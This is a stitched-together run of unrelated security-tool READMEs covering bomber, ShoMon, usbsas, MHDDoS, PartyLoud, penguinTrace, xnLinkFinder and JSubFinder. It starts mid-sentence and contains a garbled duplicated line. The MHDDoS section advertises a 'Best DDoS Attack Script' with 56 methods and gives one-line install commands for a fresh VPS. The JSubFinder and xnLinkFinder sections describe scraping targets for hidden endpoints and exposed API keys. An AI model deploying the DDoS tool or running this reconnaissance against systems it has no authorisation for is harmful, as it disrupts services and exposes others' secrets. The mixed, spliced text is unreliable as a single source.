If the provider doesn't return any vulnerabilities you'll see something like the following:
This is good for when you receive multiple SBOMs from a vendor for the same product. Or, maybe you want to find out what vulnerabilities you have in your entire organization. A folder scan will find all components, de-duplicate them, and then scan them for vulnerabilities.
# scan a folder of SBOMs (the following command will scan a folder in your current folder named "sboms")
bomber scan --username=xxx --token=xxx ./sboms
You'll see a similar result to what a Single SBOM scan will provide.
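The de-duplication step described above amounts to keying components by PURL before querying the provider; a hypothetical sketch (bomber itself is written in Go, this is just the idea):

```python
def dedupe_purls(sboms: list) -> list:
    """Merge the component lists of several SBOMs, keeping each PURL once,
    so every unique package is queried exactly one time."""
    seen = set()
    merged = []
    for components in sboms:
        for purl in components:
            if purl not in seen:
                seen.add(purl)
                merged.append(purl)
    return merged
```

Since vendors often ship overlapping SBOMs for the same product, this keeps the number of provider queries down to one per unique package.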
If you would like a readable report generated with detailed vulnerability information, you can utilize the --output
flag to save a report to an HTML file.
Example command:
bomber scan bad-bom.json --output=html
This will save a file in your current folder in the format "YYYY-MM-DD-HH-MM-SS-bomber-results.html". If you open this file in a web browser, you'll see output like the following:
bomber
can output vulnerability data in JSON format using the --output
flag. The default output is to STDOUT. There is a ton more information in the JSON output than what gets displayed in the terminal. You'll be able to see a package description and what its purpose is, the vulnerability name, a summary of the vulnerability, and more.
Example command:
bomber scan bad-bom.json --output=json
If you wish, you can set two environment variables to store your credentials, and not have to type them on the command line. Check out the Environment Variables information later in this README.
If you don't want to enter credentials all the time, you can add the following to your .bashrc
or .bash_profile
export BOMBER_PROVIDER_USERNAME={{your OSS Index user name}}
export BOMBER_PROVIDER_TOKEN={{your OSS Index API Token}}
If you want to kick the tires on bomber
you'll find a selection of test SBOMs in the test folder.
--license. If you need license info, make sure you ask for it with the SBOM.
bomber
needs to send one PURL at a time to get vulnerabilities back, so with a big SBOM it will take some time. We'll keep an eye on that.
If you would like to contribute to the development of bomber
, please refer to the CONTRIBUTING.md file in this repository. Please read the CODE_OF_CONDUCT.md file before contributing.
bomber
uses Syft to generate a Software Bill of Materials every time a developer commits code to this repository (as long as Hookz is being used and has been initialized in the working directory). More information on CycloneDX is available here.
The current CycloneDX SBOM for bomber
is available here.
A big thank-you to our friends at Smashicons for the bomber
logo.
Big kudos to our OSS homies at Sonatype for providing a wicked tool like the Sonatype OSS Index.
ShoMon is a Shodan alert feeder for TheHive written in GoLang. With version 2.0, it is more powerful than ever!
Can be used as Webhook OR Stream listener
Utilizes shadowscatcher/shodan (fantastic work) for Shodan interaction.
Console logs are in JSON format and can be ingested by any other further log management tools
CI/CD via Github Actions ensures that a proper Release with changelogs, artifacts, images on ghcr and dockerhub will be provided
Provides a working docker-compose file for TheHive and dependencies
Super fast and Super mini in size
Complete code refactoring in v2.0 resulted in more modular, maintainable code
Via conf file or environment variables, alert specifics including tags, type and alert-template can be dynamically adjusted. See config file.
Full banner can be included in Alert with direct link to Shodan Finding.
IP is added to observables
Parameters should be provided via conf.yaml
or environment variables. Please see config file and docker-compose file
After conf or environment variables are set, simply issue the command:
./shomon
go build .
go build -ldflags="-s -w" .
can be used to customize compilation and produce a smaller binary.
could be used to customize compilation and produce smaller binary.docker pull ghcr.io/kaansk/shomon
docker pull kaansk/shomon
docker build -t shomon .
docker run -it shomon
docker-compose run -d
usbsas is a free and open source (GPLv3) tool and framework for securely reading untrusted USB mass storage devices.
Following the concept of defense in depth and the principle of least privilege, usbsas's goal is to reduce the attack surface of the USB stack. To achieve this, most of the USB-related tasks (parsing USB packets, SCSI commands, file systems etc.) usually executed in (privileged) kernel space have been moved to user space and separated into different processes (microkernel style), each being executed in its own restricted secure computing mode.
The main purpose of this project is to be deployed as a kiosk / sheep dip station to securely transfer files from an untrusted USB device to a trusted one.
It works on GNU/Linux and is written in Rust.
usbsas can:
read files from an untrusted USB device without using kernel modules (uas, usb_storage and the file system ones). Supported file systems are FAT, exFAT, ext4, NTFS and ISO9660.
write files to a trusted USB device. Supported file systems are FAT, exFAT and NTFS.
Applications built on top of usbsas:
$ cargo doc
Any contribution is welcome, be it code, bug report, packaging, documentation or translation.
Dependencies included in this project:
ntfs3g
is GPLv2 (see ntfs3g/src/ntfs-3g/COPYING).
FatFs
has a custom BSD-style license (see ff/src/ff/LICENSE.txt).
fontawesome
is CC BY 4.0 (icons), SIL OFL 1.1 (fonts) and MIT (code) (see client/web/static/fontawesome/LICENSE.txt).
bootstrap
is MIT (see client/web/static/bs/LICENSE).
Lato
font is SIL OFL 1.1 (see client/web/static/fonts/LICENSE.txt).
usbsas is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
usbsas is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with usbsas. If not, see the gnu.org web site.
Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods
Please don't attack websites without the owner's consent.
python3 start.py tools
You can download it from GitHub Releases
Requirements
Videos
Tutorial
You can read it from GitHub Wiki
Clone and Install Script
git clone https://github.com/MatrixTM/MHDDoS.git
cd MHDDoS
pip install -r requirements.txt
One-Line Installing on Fresh VPS
apt -y update && apt -y install curl wget libcurl4 libssl-dev python3 python3-pip make cmake automake autoconf m4 build-essential ruby perl golang git && git clone https://github.com/MatrixTM/MHDDoS.git && cd MH* && pip3 install -r requirements.txt
PartyLoud is a highly configurable and straightforward free tool that helps you prevent tracking directly from your Linux terminal, no special skills required. Once started, you can forget it is running. It provides several flags; each flag lets you customize your experience and change PartyLoud's behaviour according to your needs.
This project was inspired by noisy.py
Clone the repository:
git clone https://github.com/realtho/PartyLoud.git
Navigate to the directory and make the script executable:
cd PartyLoud
chmod +x partyloud.sh
Run 'partyloud':
./partyloud.sh
Usage: ./partyloud.sh [options...]
-d --dns <file> DNS Servers are sourced from specified FILE,
each request will use a different DNS Server
in the list
!!WARNING THIS FEATURE IS EXPERIMENTAL!!
!!PLEASE LET ME KNOW ISSUES ON GITHUB !!
-l --url-list <file> read URL list from specified FILE
-b --blocklist <file> read blocklist from specified FILE
-p --http-proxy <http://ip:port> set a HTTP proxy
-s --https-proxy <https://ip:port> set a HTTPS proxy
-n --no-wait disable wait between one request and an other
-h --help display this help
In the current release there is no input validation on files.
If you find bugs or have suggestions on how to improve these features, please help me by opening issues on GitHub.
Default files are located in:
Please note that the file name and extension are not important; only the content of the files matters.
badwords is a keyword-based blocklist used to filter non-HTML content: images, documents and so on.
The default config has been created after several weeks of testing. If you really think you need a custom blocklist, my suggestion is to start by copying and modifying the default config according to your needs.
Here are some hints on how to create a great blocklist file:
DO ✅ | DON'T
---|---
Use only ASCII chars | Define one-site-only rules
Try to keep the rules as general as possible | Define case-sensitive rules
Prefer relative paths | Place more than one rule per line
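The hints above can be made concrete with a small sketch of keyword-based URL filtering. This is a hypothetical Python illustration; the real partyloud.sh implements its filtering in shell:

```python
def is_blocked(url, badwords):
    """Return True if the URL matches any blocklist keyword.

    Keywords are matched case-insensitively as substrings, which is why the
    README recommends general, relative-path, ASCII-only rules.
    """
    url = url.lower()
    return any(word.lower() in url for word in badwords)


badwords = [".css", ".jpg", ".png", "/static/"]
print(is_blocked("https://example.com/static/logo.png", badwords))  # True
print(is_blocked("https://example.com/articles/news", badwords))    # False
```

A rule like `/static/` (relative, general, lowercase ASCII) filters the same resource on every site, which is exactly the behaviour the DO column recommends.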
partyloud.conf is a URL list used as the starting point for the fake navigation generators.
The goal here is to create a good list of sites containing a lot of URLs.
Aside from suggesting that you avoid google, youtube and social network related links, I've really no hints for you.
DNSList is a list of DNS servers used as the argument for the random DNS feature. Random DNS is not enabled by default, so the "default file" is really just a guideline and a test used while developing the function to see if everything was working as expected.
The only suggestion here is to add as many addresses as possible to increase randomness.
penguinTrace is intended to help build an understanding of how programs run at the hardware level. It provides a way to see what instructions compile to, and then step through those instructions and see how they affect machine state as well as how this maps back to variables in the original program. A bit more background is available on the website.
penguinTrace starts a web-server which provides a web interface to edit and run code. Code can be developed in C, C++ or Assembly. The resulting assembly is then displayed and can then be stepped through, with the values of hardware registers and variables in the current scope shown.
penguinTrace runs on Linux and supports the AMD64/X86-64 and AArch64 architectures. penguinTrace can run on other operating systems using Docker, a virtual machine or through the Windows Subsystem for Linux (WSL).
The primary goal of penguinTrace is to allow exploring how programs execute on a processor, however the development provided an opportunity to explore how debuggers work and some lower-level details of interaction with the kernel.
Note: penguinTrace allows running arbitrary code as part of its design. By default it will only listen for connections from the local machine. It should only be configured to listen for remote connections on a trusted network and not exposed to the internet. This can be mitigated by running penguinTrace in a container, and a limited degree of isolation of stepped code can be provided when libcap is available.
penguinTrace requires 64-bit Linux running on a X86-64 or AArch64 processor. It can also run on a Raspberry Pi running a 64-bit (AArch64) Linux distribution. For other operating systems, it can be run on Windows 10 using the Windows Subsystem for Linux (WSL) or in a Docker container. WSL does not support tracee process isolation.
python
clang
llvm
llvm-dev
libclang-dev
libcap-dev # For containment
To build penguinTrace outside of a container, clone the repository and run make
. The binaries will be placed in build/bin
by default.
To build penguinTrace in Docker, run docker build -t penguintrace github.com/penguintrace/penguintrace
.
Once penguinTrace is built, running the penguintrace
binary will start the server.
If built in a container it can then be run with docker run -it -p 127.0.0.1:8080:8080 --tmpfs /tmp:exec --cap-add=SYS_PTRACE --cap-add=SYS_ADMIN --rm --security-opt apparmor=unconfined penguintrace penguintrace
. See Containers for details on better isolating the container.
Then navigate to 127.0.0.1:8080 or localhost:8080 to access the web interface.
Note: In order to run on port 80, you can modify the docker run command to map from port 8080 to port 80, e.g. -p 127.0.0.1:80:8080. If built locally, you can allow the binary to bind to port 80 with sudo setcap CAP_NET_BIND_SERVICE=+ep penguintrace. It can then be run with penguintrace -c SERVER_PORT 80.
penguinTrace defaults to port 8080 as it is intended to be run as an unprivileged user.
The penguinTrace server uses the system temporary directory as a location for compiled binaries and environments for running traced processes. If the PENGUINTRACE_TMPDIR
environment variable is defined, this directory will be used. It will fall back to the TMPDIR
environment variable and finally the directories specified in the C library.
This must correspond to a directory without noexec set; if running in a container, it is likely the filesystem will have this set by default.
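The lookup order described above can be sketched as follows. This is a hypothetical Python rendering; penguinTrace itself implements this natively:

```python
import os
import tempfile


def penguintrace_tmpdir():
    """Resolve the temporary directory in the order the README describes:
    PENGUINTRACE_TMPDIR, then TMPDIR, then the platform default
    (approximated here with tempfile.gettempdir())."""
    for var in ("PENGUINTRACE_TMPDIR", "TMPDIR"):
        path = os.environ.get(var)
        if path:
            return path
    return tempfile.gettempdir()
```

Whatever directory wins must not be mounted noexec, since compiled binaries are executed from it.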
By default penguinTrace only listens on the loopback device and IPv4. If the server is configured to listen on all addresses, then also setting the server to IPv6 will allow connections on both IPv4 and IPv6; this is the default mode when running in a Docker container.
This is because penguinTrace only creates a single thread to listen to connections and so can currently only bind to a single address or all addresses.
By default penguinTrace runs in multiple session mode, each time code is compiled a new session is created. The URL fragment (after the '#') of the UI is updated with the session id, and this URL can be used to reconnect to the same session.
If running in single session mode each penguinTrace instance only supports a single debugging instance. The web UI will automatically reconnect to a previous session. To support multiple sessions, multiple instances should be launched which are listening on different ports.
The docker_build.sh
and docker_run.sh
scripts provide an example of how to run penguinTrace in a Docker container. Dockerfile_noisolate
provides an alternative way of running that does not require the SYS_ADMIN
capability but provides less isolation between the server and the traced processes. The SYS_PTRACE
capability is always required for the server to trace processes. misc/apparmor-profile
provides an example AppArmor profile that is suitable for running penguinTrace but may need some customisation for the location of temporary directories and compilers.
penguinTrace will only run under a 64-bit operating system. The official operating systems provided for the Raspberry Pi are all 32-bit; to run penguinTrace, something such as pi64 or Arch Linux Arm is required.
Full instructions for setting up a 64-bit OS on Raspberry Pi TBD.
penguinTrace is developed by Alex Beharrell.
This project is licensed under the GNU AGPL. A non-permissive open source license is chosen as the intention of this project is educational, and so any derivative works should have the source available so that people can learn from it.
The bundling of the source code relies on the structure of the repository. Derivative works that are not forked from a penguinTrace repository will need to modify the Makefile rules for static/source.tar.gz
to ensure the modified source is correctly distributed.
penguinTrace makes use of jQuery and CodeMirror for some aspects of the web interface. Both are licensed under the MIT License. It also uses the Major Mono font which is licensed under the Open Font License.
This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:
The python script is based on the link finding capabilities of my Burp extension GAP. As a starting point, I took the amazing tool LinkFinder by Gerben Javado, and used the Regex for finding links, but with additional improvements to find even more.
xnLinkFinder supports Python 3.
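As a rough illustration of regex-based link finding, the sketch below uses a deliberately simplified pattern; the actual regex used by GAP/LinkFinder/xnLinkFinder is far more comprehensive:

```python
import re

# Hypothetical, much-simplified link-finding pattern: quoted absolute URLs
# or quoted root-relative paths. Real tools handle many more link shapes.
LINK_RE = re.compile(
    r"""["'](
        (?:https?://[^"'\s]+)        # absolute URLs
        |(?:/[A-Za-z0-9_./-]+)       # root-relative paths
    )["']""",
    re.VERBOSE,
)


def find_links(text):
    """Return a sorted, de-duplicated list of candidate links in text."""
    return sorted({m.group(1) for m in LINK_RE.finditer(text)})


js = 'fetch("/api/v1/users"); var cdn = "https://static.example.com/app.js";'
print(find_links(js))  # ['/api/v1/users', 'https://static.example.com/app.js']
```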
$ git clone https://github.com/xnl-h4ck3r/xnLinkFinder.git
$ cd xnLinkFinder
$ sudo python setup.py install
Arg | Long Arg | Description |
---|---|---|
-i | --input | Input a: URL, text file of URLs, a Directory of files to search, a Burp XML output file or an OWASP ZAP output file. |
-o | --output | The file to save the Links output to, including path if necessary (default: output.txt). If set to cli then output is only written to STDOUT. If the file already exists it will just be appended to (and de-duplicated) unless option -ow is passed. |
-op | --output-params | The file to save the Potential Parameters output to, including path if necessary (default: parameters.txt). If set to cli then output is only written to STDOUT (but not piped to another program). If the file already exists it will just be appended to (and de-duplicated) unless option -ow is passed. |
-ow | --output-overwrite | If the output file already exists, it will be overwritten instead of being appended to. |
-sp | --scope-prefix | Any links found starting with / will be prefixed with scope domains in the output instead of the original link. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used. |
-spo | --scope-prefix-original | If argument -sp is passed, then this determines whether the original link starting with / is also included in the output (default: false) |
-sf | --scope-filter | Will filter output links to only include them if the domain of the link is in the scope specified. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used. |
-c | --cookies † | Add cookies to pass with HTTP requests. Pass in the format 'name1=value1; name2=value2;'
|
-H | --headers † | Add custom headers to pass with HTTP requests. Pass in the format 'Header1: value1; Header2: value2;'
|
-ra | --regex-after | RegEx for filtering purposes against found endpoints before output (e.g. /api/v[0-9]\.[0-9]\* ). If it matches, the link is output. |
-d | --depth † | The level of depth to search. For example, if a value of 2 is passed, then all links initially found will then be searched for more links (default: 1). This option is ignored for Burp files because they can be huge and consume lots of memory. It is also advisable to use the -sp (--scope-prefix ) argument to ensure a request to links found without a domain can be attempted. |
-p | --processes † | Basic multithreading is done when getting requests for a URL, or file of URLs (not a Burp file). This argument determines the number of processes (threads) used (default: 25) |
-x | --exclude | Additional Link exclusions (to the list in config.yml ) in a comma separated list, e.g. careers,forum
|
-orig | --origin | Whether you want the origin of the link to be in the output. Displayed as LINK-URL [ORIGIN-URL] in the output (default: false) |
-t | --timeout † | How many seconds to wait for the server to send data before giving up (default: 10 seconds) |
-inc | --include | Include input (-i ) links in the output (default: false) |
-u | --user-agent † | What User Agents to get links for, e.g. -u desktop mobile
|
-insecure | † | Whether TLS certificate checks should be disabled when making requests (default: false) |
-s429 | † | Stop when > 95 percent of responses return 429 Too Many Requests (default: false) |
-s403 | † | Stop when > 95 percent of responses return 403 Forbidden (default: false) |
-sTO | † | Stop when > 95 percent of requests time out (default: false) |
-sCE | † | Stop when > 95 percent of requests have connection errors (default: false) |
-m | --memory-threshold | The memory threshold percentage. If the machine's memory goes above the threshold, the program will be stopped and ended gracefully before running out of memory (default: 95) |
-mfs | --max-file-size † | The maximum file size (in bytes) of a file to be checked if -i is a directory. If the file size is over the maximum, it will be ignored (default: 500 MB). Setting to 0 means no files will be ignored, regardless of size. |
-replay-proxy | † | For active link finding with URL (or file of URLs), replay the requests through this proxy. |
-ascii-only | | Whether links and parameters will only be added if they only contain ASCII characters. This can be useful when you know the target is likely to use ASCII characters and you also get a number of false positives from binary files for some reason. |
-v | --verbose | Verbose output |
-vv | --vverbose | Increased verbose output |
-h | --help | show the help message and exit |
† NOT RELEVANT FOR INPUT OF DIRECTORY, BURP XML FILE OR OWASP ZAP FILE
The config.yml file has the keys which can be updated to suit your needs:

- linkExclude - A comma separated list of strings (e.g. .css,.jpg,.jpeg etc.) that all links are checked against. If a link includes any of the strings then it will be excluded from the output. If the input is a directory, then file names are checked against this list.
- contentExclude - A comma separated list of strings (e.g. text/css,image/jpeg,image/jpg etc.) that all responses' Content-Type headers are checked against. Any responses with these content types will be excluded and not checked for links.
- fileExtExclude - A comma separated list of strings (e.g. .zip,.gz,.tar etc.) that all files in Directory mode are checked against. If a file has one of those extensions it will not be searched for links.
- regexFiles - A list of file types separated by a pipe character (e.g. php|php3|php5 etc.). These are used in the link finding regex when there are findings that aren't obvious links, but are interesting file types that you want to pick out. If you add to this list, ensure you escape any dots to ensure correct regex, e.g. js\.map
- respParamLinksFound † - Whether to get potential parameters from links found in responses: True or False
- respParamPathWords † - Whether to add path words in retrieved links as potential parameters: True or False
- respParamJSON † - If the MIME type of the response contains JSON, whether to add JSON key values as potential parameters: True or False
- respParamJSVars † - Whether javascript variables set with var, let or const are added as potential parameters: True or False
- respParamXML † - If the MIME type of the response contains XML, whether to add XML attribute values as potential parameters: True or False
- respParamInputField † - If the MIME type of the response contains HTML, whether to add NAME and ID attributes of any INPUT fields as potential parameters: True or False
- respParamMetaName † - If the MIME type of the response contains HTML, whether to add NAME attributes of any META tags as potential parameters: True or False

† IF THESE ARE NOT FOUND IN THE CONFIG FILE THEY WILL DEFAULT TO True
python3 xnLinkFinder.py -i target.com
Ideally, provide a scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results only to relevant domains (this can be a file or in-scope domains). Also, you can pass cookies and custom headers to ensure you find links only available to authorised users. Specifying the user agent (-u desktop mobile) will first search for all links using desktop user agents, and then try again using mobile user agents. There could be specific endpoints that are related to the user agent given. Giving a depth value (-d) will keep sending requests to links found on the previous depth search to find more links.
python3 xnLinkFinder.py -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10
If you have a file of JS file URLs for example, you can look for links in those:
python3 xnLinkFinder.py -i target_js.txt
If you have files, e.g. JS files, HTTP responses, etc., you can look for links in those:
python3 xnLinkFinder.py -i ~/Tools/waymore/results/target.com
NOTE: Sub directories are also checked. The -mfs
option can be specified to skip files over a certain size.
In Burp, select the items you want to search (by highlighting the scope, for example), right clicking and selecting Save selected items. Ensure that the base64-encode requests and responses option is checked before saving. To get all links from the file (even with HUGE files, you'll be able to get all the links):
python3 xnLinkFinder.py -i target_burp.xml
NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i
starts with <?xml
then you are trying to process a Burp file.
Ideally, provide scope prefix (-sp
) with the primary domain (including schema), and a scope filter (-sf
) to filter the results only to relevant domains.
python3 xnLinkFinder.py -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv
In ZAP, select the items you want to search by highlighting the History for example, clicking menu Report
and selecting Export Messages to File...
. This will let you save an ASCII text file of all requests and responses you want to search. To get all links from the file (even with HUGE files, you'll be able to get all the links):
python3 xnLinkFinder.py -i target_zap.txt
NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i
is in the format ==== 99 ==========
for example, then you are trying to process an OWASP ZAP ASCII text file.
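The two file-type detection rules described in the notes above could be sketched like this (a hypothetical helper, not xnLinkFinder's actual code):

```python
import re


def sniff_input_type(first_line: str) -> str:
    """Guess the input type from the first line of the -i file:
    a leading '<?xml' means a Burp export, a '==== 99 ==========' style
    separator means an OWASP ZAP ASCII export, anything else is plain input."""
    if first_line.lstrip().startswith("<?xml"):
        return "burp"
    if re.match(r"^==== \d+ =+\s*$", first_line):
        return "zap"
    return "plain"


print(sniff_input_type('<?xml version="1.0"?>'))   # burp
print(sniff_input_type("==== 99 =========="))      # zap
print(sniff_input_type("https://target.com/page")) # plain
```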
You can pipe xnLinkFinder to other tools. Any errors are sent to stderr
and any links found are sent to stdout
. The output file is still created in addition to the links being piped to the next program. However, potential parameters are not piped to the next program, but they are still written to file. For example:
python3 xnLinkFinder.py -i redbull.com -sp https://redbull.com -sf redbull.* -d 3 | unfurl keys | sort -u
You can also pass the input through stdin
instead of -i
.
cat redbull_subs.txt | python3 xnLinkFinder.py -sp https://redbull.com -sf redbull.* -d 3
NOTE: You can't pipe in a Burp or ZAP file, these must be passed using -i
.
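The stdout/stderr split that makes this piping work can be illustrated with a minimal sketch (hypothetical, not the tool's actual code):

```python
import sys


def emit(links, errors):
    """Links go to stdout so they can be piped to tools like unfurl;
    diagnostics go to stderr so they don't pollute the pipeline."""
    for link in links:
        print(link)                        # stdout: consumed by the next tool
    for err in errors:
        print(f"[ERR] {err}", file=sys.stderr)  # stderr: visible, not piped
```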
- Provide the scope prefix argument -sp. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no path should be included, and no wildcards used; schema is optional, but will default to http):
  http://www.target.com
  https://target-payments.com
  https://static.target-cdn.com
- If a link found is, for example, /path/to/example.js, then passing -sp http://www.target.com will result in the output http://www.target.com/path/to/example.js, and if Depth (-d) is >1 then a request will be able to be made to that URL to search for more links. If a file of domains is passed using -sp, then the output will include each domain followed by /path/to/example.js, increasing the chance of finding more links.
- If you use -sp but still want the original link of /path/to/example.js (without a domain) additionally returned in the output, pass the argument -spo.
- Provide the scope filter argument -sf. This will ensure that only relevant domains are returned in the output and, more importantly, if Depth (-d) is >1 then out of scope targets will not be searched for links or parameters. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no schema or path should be included):
  target.*
  target-payments.com
  static.target-cdn.com
- Filter the output links with a regex using -ra. It's always a good idea to use https://regex101.com/ to check your regex expression is going to do what you expect.
- Use the -v option to have a better idea of what the tool is doing.
- If you have problems, use the -vv option, which may show errors that are occurring; these can possibly be resolved, or you can raise them as an issue on GitHub.
- Pass cookie (-c), header (-H) and regex (-ra) values within single quotes, e.g. -ra '/api/v[0-9]\.[0-9]\*'
- Use the -o option to give a specific output file name for Links, rather than the default of output.txt. If you plan on running a large depth of searches, start with 2 with option -v to check what is being returned. Then you can increase the depth, and the new output will be appended to the existing file, unless you pass -ow.
- Use the -op option to give a specific output file name for Potential Parameters, rather than the default of parameters.txt. Any output will be appended to the existing file, unless you pass -ow.
- When using a large depth (-d), be wary of some sites using dynamic links, as the tool will just keep finding new ones. If no new links are being found, then xnLinkFinder will stop searching. Providing the stop flags (-s429, -s403, -sTO, -sCE) should also be considered.
- If you are scanning a large site (or the -d value is high) and have limited resources, the program will stop when it reaches the memory threshold (-m) value and end gracefully with data intact before getting killed.
- If you stop the program (Ctrl-C) in the middle of running, be patient and any gathered data will be saved before ending gracefully.
- Using the -orig option will show the URL where the link was found. This can mean you have duplicate links in the output if the same link was found on multiple sources, but each will be suffixed with the origin URL in square brackets.
- The default user agent is desktop. If you have a target that could have different links for different user agent groups, then specify -u desktop mobile, for example (separated with a space). The mobile user agent option is a combination of mobile-apple, mobile-android and mobile-windows.
- If -i has been set to a directory, the contents of the files in the root of that directory will be searched for links. Files in sub-directories are not searched. Any files over the size set by -mfs (default: 500 MB) will be skipped.
- When using the -replay-proxy option, sometimes requests can take longer. If you start seeing more Request Timeout errors (you'll see errors if you use the -v or -vv options) then consider using -t to raise the timeout limit.
- If you know the target is likely to only contain ASCII characters in links and parameters, consider passing -ascii-only. This can eliminate a number of false positives that can sometimes get returned from binary data.

If you come across any problems at all, or have ideas for improvements, please feel free to raise an issue on GitHub. If there is a problem, it will be useful if you can provide the exact command you ran and a detailed description of the problem. If possible, run with -vv to reproduce the problem and let me know about any error messages that are given.
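The -sp/-spo behaviour described in the notes above can be sketched as follows (a hypothetical helper, not xnLinkFinder's implementation):

```python
def apply_scope_prefix(link, scope_domains, include_original=False):
    """Prefix root-relative links with every scope domain (-sp); with
    include_original (-spo), also keep the bare /path link in the output.
    Absolute links pass through unchanged."""
    if not link.startswith("/"):
        return [link]
    out = [domain.rstrip("/") + link for domain in scope_domains]
    if include_original:
        out.append(link)
    return out


print(apply_scope_prefix(
    "/path/to/example.js",
    ["http://www.target.com", "https://target-payments.com"],
    include_original=True,
))
```

With a file of scope domains, each one yields its own candidate URL, which is what increases the chance of finding more links at depth >1.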
Active link finding for a domain:
Piped input and output:
Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! ☕ (I could use the caffeine!)
JSubFinder is a tool written in Golang to search webpages and JavaScript for hidden subdomains and secrets in the given URL. Developed with bug bounty hunters in mind, JSubFinder takes advantage of Go's amazing performance, allowing it to utilize large data sets and be easily chained with other tools.
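As a rough sketch of what regex-based subdomain harvesting looks like (illustrative Python; JSubFinder itself is written in Go):

```python
import re


def find_subdomains(text, root="google.com"):
    """Collect subdomains of `root` mentioned anywhere in page/JS content.
    Simplified stand-in for JSubFinder's extraction, for illustration only."""
    pattern = re.compile(
        r"\b((?:[a-z0-9-]+\.)+" + re.escape(root) + r")\b", re.IGNORECASE
    )
    return sorted({m.group(1).lower() for m in pattern.finditer(text)})


html = '<script src="https://apis.google.com/js/api.js"></script> mail.google.com'
print(find_subdomains(html))  # ['apis.google.com', 'mail.google.com']
```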
Install the application and download the signatures needed to find secrets
Using GO:
go get github.com/ThreatUnkown/jsubfinder
wget https://raw.githubusercontent.com/ThreatUnkown/jsubfinder/master/.jsf_signatures.yaml && mv .jsf_signatures.yaml ~/.jsf_signatures.yaml
or
Search the given url's for subdomains and secrets
$ jsubfinder search -h
Execute the command specified
Usage:
JSubFinder search [flags]
Flags:
-c, --crawl Enable crawling
-g, --greedy Check all files for URL's not just Javascript
-h, --help help for search
-f, --inputFile string File containing domains
-t, --threads int Amount of threads to be used (default 5)
-u, --url strings Url to check
Global Flags:
-d, --debug Enable debug mode. Logs are stored in log.info
-K, --nossl Skip SSL cert verification (default true)
-o, --outputFile string name/location to store the file
-s, --secrets Check results for secrets e.g api keys
--sig string Location of signatures for finding secrets
-S, --silent Disable printing to the console
Examples (results are the same in this case):
$ jsubfinder search -u www.google.com
$ jsubfinder search -f file.txt
$ echo www.google.com | jsubfinder search
$ echo www.google.com | httpx --silent | jsubfinder search
apis.google.com
ogs.google.com
store.google.com
mail.google.com
accounts.google.com
www.google.com
policies.google.com
support.google.com
adservice.google.com
play.google.com
Note: --secrets="" will save the secret results in a secrets.txt file
$ echo www.youtube.com | jsubfinder search --secrets=""
www.youtube.com
youtubei.youtube.com
payments.youtube.com
2Fwww.youtube.com
252Fwww.youtube.com
m.youtube.com
tv.youtube.com
music.youtube.com
creatoracademy.youtube.com
artists.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
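Signature-based secret detection of the kind shown above can be sketched as follows. The patterns here are illustrative stand-ins for the real .jsf_signatures.yaml, and this is Python rather than JSubFinder's Go:

```python
import re

# Hypothetical signature set; the real signatures file ships many more
# named patterns. The Google API key prefix/length is a well-known shape.
SIGNATURES = {
    "Google Cloud API Key": re.compile(r"AIza[0-9A-Za-z_-]{35}"),
    "Slack Token": re.compile(r"xox[abpr]-[0-9A-Za-z-]{10,48}"),
}


def find_secrets(content, url):
    """Run every signature over the response body and report hits
    in the same style as JSubFinder's output."""
    hits = []
    for name, pattern in SIGNATURES.items():
        for match in pattern.finditer(content):
            hits.append(f"{name} {match.group(0)} found in content of {url}")
    return hits


body = 'var key = "AIza' + 'A' * 35 + '";'
for hit in find_secrets(body, "https://www.youtube.com"):
    print(hit)
```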
$ echo www.google.com | jsubfinder search -crawl -s "google_secrets.txt" -S -o jsf_google.txt -t 10 -g
- -crawl: use the default crawler to crawl pages for other URLs to analyze
- -s: enables JSubFinder to search for secrets
- -S: silence output to the console
- -o <file>: save output to the specified file
- -t 10: use 10 threads
- -g: search every URL for JS, even ones we don't think have any

Enables the upstream HTTP proxy with TLS MITM support. This allows you to:
$ JSubFinder proxy -h
Execute the command specified
Usage:
JSubFinder proxy [flags]
Flags:
-h, --help help for proxy
-p, --port int Port for the proxy to listen on (default 8444)
--scope strings URLs in scope separated by commas, e.g. www.google.com,www.netflix.com
-u, --upstream-proxy string Address of upstream proxy e.g http://127.0.0.1:8888 (default "http://127.0.0.1:8888")
Global Flags:
-d, --debug Enable debug mode. Logs are stored in log.info
-K, --nossl Skip SSL cert verification (default true)
-o, --outputFile string name/location to store the file
-s, --secrets Check results for secrets e.g api keys
--sig string Location of signatures for finding secrets
-S, --silent Disable printing to the console
$ jsubfinder proxy
Proxy started on :8444
Subdomain: out.reddit.com
Subdomain: www.reddit.com
Subdomain: 2Fwww.reddit.com
Subdomain: alb.reddit.com
Subdomain: about.reddit.com
Burp Suite will now forward all traffic proxied through it to JSubFinder. JSubFinder will retrieve the response, return it to Burp and, in another thread, search for subdomains and secrets.
proxify -output logs
jsubfinder proxy -u http://127.0.0.1:8443
replay -output logs -burp-addr http://127.0.0.1:8444
Simple: run JSubFinder in proxy mode on another server, e.g. 192.168.1.2. Follow the proxy steps above but set your application's upstream proxy to 192.168.1.2:8443.
$ jsubfinder proxy --scope www.reddit.com -p 8081 -S -o jsf_reddit.txt
